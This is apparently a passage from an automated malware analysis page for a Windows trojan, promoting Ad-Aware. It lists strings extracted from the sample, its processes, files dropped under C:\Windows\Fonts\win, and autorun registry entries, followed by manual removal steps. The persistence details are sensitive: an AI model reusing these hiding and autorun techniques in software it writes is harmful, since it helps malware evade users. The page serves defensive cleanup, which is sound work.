" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:6B8FF1FAAB6811E4887EC2849E2C3581" xmpMM:DocumentID="xmp.did:6B8FF1FBAB6811E4887EC2849E2C3581"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6B8FF1F8AB6811E4887EC2849E2C3581" stRef:documentID="xmp.did:6B8FF1F9AB6811E4887EC2849E2C3581"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>7

p8<%uF

.The file (%s) aleady exists.

hXXp://VVV.4345.cc

{8856F961-340A-11D0-A96B-00C04FD705A2}

msctls_hotkey32

HotKey1

FlowSE.exe

IDS_PASSWORD_ERROR

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   wbmoney.exe:1256
   wbmoney.exe:2052
   wbmoney.exe:3752
   wbmoney.exe:3460
   %original file name%.exe:2604
   setmss.exe:644
   setmss.exe:3440
   LLVier.exe:472
   LLVier.exe:1612
   LLVier.exe:3352

2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012016112620161127\index.dat (16 bytes)
   C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F5BEJ4YJ\flowtips[1].htm (2862 bytes)
   C:\Windows\Fonts\win\LLVier.exe (424 bytes)
   C:\Windows\wbmoney.exe (614 bytes)
   C:\Windows\LLViewer.exe (2 bytes)
   C:\Windows\Fonts\win\setmss.exe (2 bytes)
   C:\Windows\updatezb.exe (196 bytes)
   C:\Windows\Fonts\win\TTHB.bat (5 bytes)
   C:\Windows\TbViewer.exe (3 bytes)
   C:\Windows\Config.ini (155 bytes)
   C:\ .bat (113 bytes)
   C:\Windows\Fonts\win\TB.bat (223 bytes)
   C:\Windows\Alexa.dll (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\1_0_ttbrowser.exe[1].zip (1133516 bytes)
   C:\Windows\Fonts\win\1_0_ttbrowser.exe.zip (950255 bytes)
   C:\Windows\Fonts\win\update.txt (166 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\ttll\vest3368\Cookies\index.dat (16 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\update_stworker[1].txt (166 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\ttll\vest3368\Cookies\R2QLPNUL.txt (116 bytes)
   C:\Windows\Fonts\win\browser\QtCore4.dll (77238 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\1_0_QtGui4.dll[1].zip (264629 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\XDZVB81J.txt (113 bytes)
   C:\Windows\Fonts\win\1_0_browser.exe.zip (29536 bytes)
   C:\Windows\Fonts\win\1_0_QtGui4.dll.zip (227889 bytes)
   C:\Windows\Fonts\win\browser\browser.exe (10136 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\1_0_browser.exe[1].zip (35992 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\1_0_º£ÂíÁ÷Á¿.exe[1].zip (48658 bytes)
   C:\Windows\Fonts\win\1_0_º£ÂíÁ÷Á¿.exe.zip (44168 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\1_0_QtCore4.dll[1].zip (254212 bytes)
   C:\Windows\Fonts\win\1_0_QtCore4.dll.zip (210446 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\update_hmflower[1].txt (609 bytes)

4. Delete the following value(s) in the autorun key (How to Work with System Registry):
   

   [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
   "SEOWorker2014" = "C:\Windows\Fonts\win\setmss.exe -autorun"
   
   [HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
   "SEOWorker2014" = "C:\Windows\Fonts\win\setmss.exe -autorun"
   
   [HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
   "HMFlower2016" = "C:\Windows\Fonts\win\LLVier.exe -autorun"
   
   [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
   "HMFlower2016" = "C:\Windows\Fonts\win\LLVier.exe -autorun"

5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
6. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.